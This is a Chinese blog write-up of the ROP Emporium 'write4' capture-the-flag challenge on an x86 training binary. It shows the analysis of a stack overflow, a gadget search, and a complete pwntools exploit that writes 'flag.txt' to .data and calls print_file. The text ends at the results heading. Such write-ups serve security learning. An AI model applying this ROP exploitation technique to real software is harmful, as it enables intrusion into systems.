<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-loading-bar.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"guoxb.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":false,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="write4题目链接：https:&#x2F;&#x2F;ropemporium.com&#x2F;challenge&#x2F;write4.html x86根据题目的提示可知，在本题程序中并没有存在levle2中的字符串，但是题目给了一个重要的信息，就是链接库中存在一个print_file函数，只需要将你希望读取的文件名（如：“flag.txt”）作为第一个参数调用即可。结合后续的提示，我们可以得到如下思路：">
<meta property="og:type" content="article">
<meta property="og:title" content="Challenge4_write4">
<meta property="og:url" content="http://guoxb.top/2023/03/15/ROP_Emporium/Challenge4-write4/index.html">
<meta property="og:site_name" content="GuoXB&#39;s Blog">
<meta property="og:description" content="write4题目链接：https:&#x2F;&#x2F;ropemporium.com&#x2F;challenge&#x2F;write4.html x86根据题目的提示可知，在本题程序中并没有存在levle2中的字符串，但是题目给了一个重要的信息，就是链接库中存在一个print_file函数，只需要将你希望读取的文件名（如：“flag.txt”）作为第一个参数调用即可。结合后续的提示，我们可以得到如下思路：">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-03-15T15:43:03.000Z">
<meta property="article:modified_time" content="2023-03-28T13:59:53.909Z">
<meta property="article:author" content="郭小白QAQ">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://guoxb.top/2023/03/15/ROP_Emporium/Challenge4-write4/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>
<link rel="stylesheet" type="text/css" href="/css/injector/main.css" /><link rel="preload" as="style" href="/css/injector/light.css" /><link rel="preload" as="style" href="/css/injector/dark.css" />
  <title>Challenge4_write4 | GuoXB's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">GuoXB's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://guoxb.top/2023/03/15/ROP_Emporium/Challenge4-write4/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/202303122318253.jpg">
      <meta itemprop="name" content="郭小白QAQ">
      <meta itemprop="description" content="精彩不亮丽，起落是无常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="GuoXB's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Challenge4_write4
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-03-15 23:43:03" itemprop="dateCreated datePublished" datetime="2023-03-15T23:43:03+08:00">2023-03-15</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-03-28 21:59:53" itemprop="dateModified" datetime="2023-03-28T21:59:53+08:00">2023-03-28</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ROP-Emporium/" itemprop="url" rel="index"><span itemprop="name">ROP_Emporium</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>1.5k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>5 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="write4"><a href="#write4" class="headerlink" title="write4"></a>write4</h1><p>题目链接：<a target="_blank" rel="noopener" href="https://ropemporium.com/challenge/write4.html">https://ropemporium.com/challenge/write4.html</a></p>
<h2 id="x86"><a href="#x86" class="headerlink" title="x86"></a>x86</h2><p>根据题目的提示可知，在本题程序中并没有存在levle2中的字符串，但是题目给了一个重要的信息，就是链接库中存在一个<code>print_file</code>函数，只需要将你希望读取的文件名（如：“flag.txt”）作为第一个参数调用即可。结合后续的提示，我们可以得到如下思路：</p>
<span id="more"></span>

<p>将字符串<code>flag.txt</code>从栈上写入到数据段，然后调用<code>print_file</code>函数，并将字符串作为参数传递。如果直接写在栈上，这样就引入了一个难题，我们需要额外在获取栈的地址，所以我们选择写入到数据段，根据<code>readelf</code>可以看到.data有rw权限。</p>
<p>首先还是按流程，先检查下程序保护情况：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">checksec ./write432</span> </span><br><span class="line">[*] &#x27;/home/giantbranch/Desktop/rop_emporium_all_challenges/level4_write4/32/write432&#x27;</span><br><span class="line">    Arch:     i386-32-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x8048000)</span><br><span class="line">    RUNPATH:  &#x27;.&#x27;</span><br></pre></td></tr></table></figure>

<p>因为有链接库，根据之前的经验，我们直接查看程序中的导入的链接库中的函数：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">rabin2 -i write432</span> </span><br><span class="line">[Imports]</span><br><span class="line">nth vaddr      bind   type   lib name</span><br><span class="line">―――――――――――――――――――――――――――――――――――――</span><br><span class="line">1   0x080483b0 GLOBAL FUNC       pwnme</span><br><span class="line">2   0x000003e0 WEAK   NOTYPE     __gmon_start__</span><br><span class="line">3   0x080483c0 GLOBAL FUNC       __libc_start_main</span><br><span class="line">4   0x080483d0 GLOBAL FUNC       print_file</span><br></pre></td></tr></table></figure>

<p>可以看到，·<code>pwnme</code>和<code>print_file</code>函数均在库函数中，我们加载分析链接库，具体看一下这两个函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$ r2 -A ./libwrite432.so </span><br><span class="line">[<span class="number">0x000005a0</span>]&gt; s sym.pwnme </span><br><span class="line">[<span class="number">0x0000069d</span>]&gt; pdg</span><br><span class="line"></span><br><span class="line"><span class="comment">// WARNING: Variable defined which should be unmapped: var_4h</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> sym.pwnme(<span class="type">void</span>)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int32_t</span> unaff_EBX;</span><br><span class="line">    uint s;</span><br><span class="line">    uint var_4h;</span><br><span class="line">    </span><br><span class="line">    entry0();</span><br><span class="line">    sym.imp.setvbuf(**(unaff_EBX + <span class="number">0x194f</span>), <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line">    sym.imp.<span class="built_in">puts</span>(unaff_EBX + <span class="number">0x14f</span>);</span><br><span class="line">    sym.imp.<span class="built_in">puts</span>(unaff_EBX + <span class="number">0x166</span>);</span><br><span class="line">    sym.imp.<span class="built_in">memset</span>(&amp;s, <span class="number">0</span>, <span class="number">0x20</span>);</span><br><span class="line">    sym.imp.<span class="built_in">puts</span>(unaff_EBX + <span class="number">0x16b</span>);</span><br><span class="line">    sym.imp.<span class="built_in">printf</span>(unaff_EBX + <span class="number">0x194</span>);</span><br><span class="line">    sym.imp.read(<span class="number">0</span>, &amp;s, <span class="number">0x200</span>);</span><br><span class="line">    sym.imp.<span class="built_in">puts</span>(unaff_EBX + <span class="number">0x197</span>);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>同样，<code>read</code>函数处存在栈溢出漏洞</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">0x0000069d</span>]&gt; s sym.print_file </span><br><span class="line">[<span class="number">0x0000074f</span>]&gt; pdg</span><br><span class="line"></span><br><span class="line"><span class="comment">// WARNING: Variable defined which should be unmapped: var_4h</span></span><br><span class="line"></span><br><span class="line"><span class="type">void</span> sym.print_file(<span class="type">int32_t</span> filename)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">int32_t</span> unaff_EBX;</span><br><span class="line">    <span class="type">int32_t</span> *piVar1;</span><br><span class="line">    <span class="type">int32_t</span> iStack76;</span><br><span class="line">    <span class="type">int32_t</span> iStack72;</span><br><span class="line">    uint uStack64;</span><br><span class="line">    uchar auStack60 [<span class="number">11</span>];</span><br><span class="line">    uint s;</span><br><span class="line">    <span class="type">int32_t</span> stream;</span><br><span class="line">    uint var_4h;</span><br><span class="line">    </span><br><span class="line">    piVar1 = auStack60;</span><br><span class="line">    uStack64 = <span class="number">0x75b</span>;</span><br><span class="line">    entry0();</span><br><span class="line">    stream = <span class="number">0</span>;</span><br><span class="line">    iStack72 = unaff_EBX + <span class="number">0xf0</span>;</span><br><span class="line">    iStack76 = filename;</span><br><span class="line">    stream = sym.imp.fopen();</span><br><span class="line">    <span class="keyword">if</span> (stream == <span class="number">0</span>) &#123;</span><br><span class="line">        iStack72 = filename;</span><br><span class="line">        iStack76 = unaff_EBX + <span class="number">0xf2</span>;</span><br><span class="line">        piVar1 = &amp;iStack76;</span><br><span class="line">        sym.imp.<span class="built_in">printf</span>();</span><br><span class="line">        iStack76 = <span class="number">1</span>;</span><br><span class="line">        sym.imp.<span class="built_in">exit</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    *(piVar1 + <span class="number">-8</span>) = stream;</span><br><span class="line">    *(piVar1 + <span class="number">-0xc</span>) = <span class="number">0x21</span>;</span><br><span class="line">    *(piVar1 + <span class="number">-0x10</span>) = &amp;s;</span><br><span class="line">    *(piVar1 + <span class="number">-0x14</span>) = <span class="number">0x7b6</span>;</span><br><span class="line">    sym.imp.fgets();</span><br><span class="line">    *(piVar1 + <span class="number">-0x10</span>) = &amp;s;</span><br><span class="line">    *(piVar1 + <span class="number">-0x14</span>) = <span class="number">0x7c5</span>;</span><br><span class="line">    sym.imp.<span class="built_in">puts</span>();</span><br><span class="line">    *(piVar1 + <span class="number">-0x10</span>) = stream;</span><br><span class="line">    *(piVar1 + <span class="number">-0x14</span>) = <span class="number">0x7d3</span>;</span><br><span class="line">    sym.imp.fclose();</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里不得不说一句，还是用IDA反编译看起来比较舒服，这里就当是联系其他的工具吧，技多不压身。</p>
<p>接着我们在看下程序中的函数有哪些：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">r2 -A ./write432</span></span><br><span class="line"><span class="meta prompt_">[0x080483f0]&gt; </span><span class="language-bash">afl</span></span><br><span class="line">0x080483f0    1     50 entry0</span><br><span class="line">0x08048423    1      4 fcn.08048423</span><br><span class="line">0x080483c0    1      6 sym.imp.__libc_start_main</span><br><span class="line">0x0804837c    3     35 sym._init</span><br><span class="line">0x08048440    1      4 sym.__x86.get_pc_thunk.bx</span><br><span class="line">0x080483e0    1      6 sym..plt.got</span><br><span class="line">0x080485b4    1     20 sym._fini</span><br><span class="line">0x08048450    4     41 sym.deregister_tm_clones</span><br><span class="line">0x08048490    4     54 sym.register_tm_clones</span><br><span class="line">0x080484d0    3     31 sym.__do_global_dtors_aux</span><br><span class="line">0x08048500    1      6 sym.frame_dummy</span><br><span class="line">0x0804852a    1     25 sym.usefulFunction</span><br><span class="line">0x080483d0    1      6 sym.imp.print_file</span><br><span class="line">0x080485b0    1      2 sym.__libc_csu_fini</span><br><span class="line">0x08048550    4     93 sym.__libc_csu_init</span><br><span class="line">0x08048430    1      2 sym._dl_relocate_static_pie</span><br><span class="line">0x08048506    1     36 main</span><br><span class="line">0x080483b0    1      6 sym.imp.pwnme</span><br></pre></td></tr></table></figure>

<p>从这里我们可以看到几个有用的函数<code>usefulFunction</code>、<code>imp.print_file</code>、<code>imp.pwnme</code>，后两个我们已经在链接库中看过了，我们再来看下第一个函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">0x080483f0</span>]&gt; s sym.usefulFunction </span><br><span class="line">[<span class="number">0x0804852a</span>]&gt; pdg</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> sym.usefulFunction(<span class="type">void</span>)</span><br><span class="line"></span><br><span class="line">&#123;</span><br><span class="line">    sym.imp.print_file(<span class="string">&quot;nonexistent&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>该函数的作用就是调用<code>print_file</code>，emm，怎么说，也没有那么的usefull😂</p>
<p>其实，这里如果我们用<code>pwndbg</code>来查看函数信息，会有不一样的发现，（在IDA中也能发现）：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">info <span class="keyword">function</span></span></span><br><span class="line">All defined functions:</span><br><span class="line"></span><br><span class="line">Non-debugging symbols:</span><br><span class="line">0x0804837c  _init</span><br><span class="line">0x080483b0  pwnme@plt</span><br><span class="line">0x080483c0  __libc_start_main@plt</span><br><span class="line">0x080483d0  print_file@plt</span><br><span class="line">0x080483f0  _start</span><br><span class="line">0x08048430  _dl_relocate_static_pie</span><br><span class="line">0x08048440  __x86.get_pc_thunk.bx</span><br><span class="line">0x08048450  deregister_tm_clones</span><br><span class="line">0x08048490  register_tm_clones</span><br><span class="line">0x080484d0  __do_global_dtors_aux</span><br><span class="line">0x08048500  frame_dummy</span><br><span class="line">0x08048506  main</span><br><span class="line">0x0804852a  usefulFunction</span><br><span class="line">0x08048543  usefulGadgets</span><br><span class="line">0x08048550  __libc_csu_init</span><br><span class="line">0x080485b0  __libc_csu_fini</span><br><span class="line">0x080485b4  _fini</span><br></pre></td></tr></table></figure>

<p>我们可以看到，在<code>0x08048543</code>地址处，有一个叫<code>usefulGadgets</code>的函数，从名字上来看，它能够给我们提供一些有用的gadgets，我们反汇编查看一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">pwndbg&gt; </span><span class="language-bash">disass usefulGadgets</span> </span><br><span class="line">Dump of assembler code for function usefulGadgets:</span><br><span class="line">   0x08048543 &lt;+0&gt;:	mov    DWORD PTR [edi],ebp</span><br><span class="line">   0x08048545 &lt;+2&gt;:	ret    </span><br><span class="line">   0x08048546 &lt;+3&gt;:	xchg   ax,ax</span><br><span class="line">   0x08048548 &lt;+5&gt;:	xchg   ax,ax</span><br><span class="line">   0x0804854a &lt;+7&gt;:	xchg   ax,ax</span><br><span class="line">   0x0804854c &lt;+9&gt;:	xchg   ax,ax</span><br><span class="line">   0x0804854e &lt;+11&gt;:	xchg   ax,ax</span><br><span class="line">End of assembler dump.</span><br></pre></td></tr></table></figure>

<p><code>mov DWORD PTR [edi],ebp</code>是一个很有用的gadgets，它将<code>ebp</code>寄存器的内容移动到地址为（<code>edi</code>寄存器的内容）的地址处，如果我们能把<code>ebp</code>的值设置为<code>rw</code>区域的地址，那么我们就能把<code>ebp</code>里的内容写入到上边。</p>
<p>顺着这个思路，我们就需要找到对<code>edi</code>，<code>ebp</code>操作的gadgets</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; rop --grep &quot;pop edi&quot;</span><br><span class="line">0x080485a5 : add esp, 0xc ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080485a4 : jecxz 0x8048531 ; les ecx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080485a3 : jne 0x8048591 ; add esp, 0xc ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080485a6 : les ecx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080485a7 : or al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080485a8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080485aa : pop edi ; pop ebp ; ret</span><br><span class="line">0x080485a9 : pop esi ; pop edi ; pop ebp ; ret</span><br></pre></td></tr></table></figure>

<p><code>0x080485aa</code>处的gadget刚好满足我们的两个要求</p>
<p>接着，我们查找下数据段地址：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">$ </span><span class="language-bash">readelf -S write432</span></span><br><span class="line"> ...</span><br><span class="line"> [24] .data             PROGBITS        0804a018 001018 000008 00  WA  0   0  4</span><br><span class="line"> ...</span><br></pre></td></tr></table></figure>

<p><code>0x0804a018</code>就是数据段的起始地址，我们可以构建ROP链了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">padding					#padding</span><br><span class="line">pop edi; pop ebp; ret	#覆盖原来的返回地址，设置寄存器的值</span><br><span class="line">data addr + &#x27;flag&#x27;		#数据段地址 和 参数‘flag’</span><br><span class="line">mov [edi],ebp; ret		#将参数从寄存器转移到数据段</span><br><span class="line">pop edi; pop ebp; ret	#设置寄存器的值</span><br><span class="line">data addr+4 + &#x27;.txt&#x27;	#数据段地址 和 参数&#x27;.txt&#x27;</span><br><span class="line">mov [edi],ebp; ret		#将参数从寄存器转移到数据段</span><br><span class="line">print_file addr			#print_file函数地址</span><br><span class="line">fake_return addr		#预留返回地址</span><br><span class="line">data addr				#参数flag.txt在数据段中的地址</span><br></pre></td></tr></table></figure>

<p>完整的exploit代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./write432&#x27;</span>)</span><br><span class="line">e = ELF(<span class="string">&#x27;./write432&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">print_addr = p32(e.plt[<span class="string">&quot;print_file&quot;</span>]) <span class="comment">#80483d0</span></span><br><span class="line"></span><br><span class="line">flag_addr = p32(<span class="number">0x0804a018</span>) <span class="comment">#.data section</span></span><br><span class="line">flag_addr2= p32(<span class="number">0x0804a018</span> + <span class="number">4</span>)</span><br><span class="line"></span><br><span class="line">pop_edi_ebp_addr =  p32(<span class="number">0x080485aa</span>) <span class="comment"># pop edi;pop ebp ;ret</span></span><br><span class="line"></span><br><span class="line">mov_data_addr = p32(<span class="number">0x08048543</span>) <span class="comment"># mov dword ptr [edi], ebp ; ret</span></span><br><span class="line"></span><br><span class="line">offset = <span class="number">44</span></span><br><span class="line"></span><br><span class="line">payload = offset*<span class="string">b&#x27;A&#x27;</span></span><br><span class="line">payload+= pop_edi_ebp_addr + flag_addr + <span class="string">b&#x27;flag&#x27;</span> </span><br><span class="line">payload+= mov_data_addr</span><br><span class="line">payload+= pop_edi_ebp_addr + flag_addr2 + <span class="string">b&#x27;.txt&#x27;</span></span><br><span class="line">payload+= mov_data_addr</span><br><span class="line">payload+= print_addr</span><br><span class="line">payload+= p32(<span class="number">1</span>)</span><br><span class="line">payload+= flag_addr</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
